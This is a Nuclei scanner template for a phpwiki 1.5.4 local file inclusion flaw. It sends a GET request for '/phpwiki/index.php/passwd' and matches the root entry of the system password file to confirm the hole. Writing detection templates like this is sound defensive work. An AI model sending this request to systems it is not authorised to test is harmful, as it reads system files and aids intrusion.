nuclei-templates/vulnerabilities/other/phpwiki-lfi.yaml

26 lines
600 B
YAML

id: phpwiki-lfi
info:
name: phpwiki 1.5.4 - XSS / Local File Inclusion
author: 0x_Akoko
severity: high
description: A vulnerability in phpwiki allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint.
reference: https://www.exploit-db.com/exploits/38027
tags: phpwiki,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/phpwiki/index.php/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200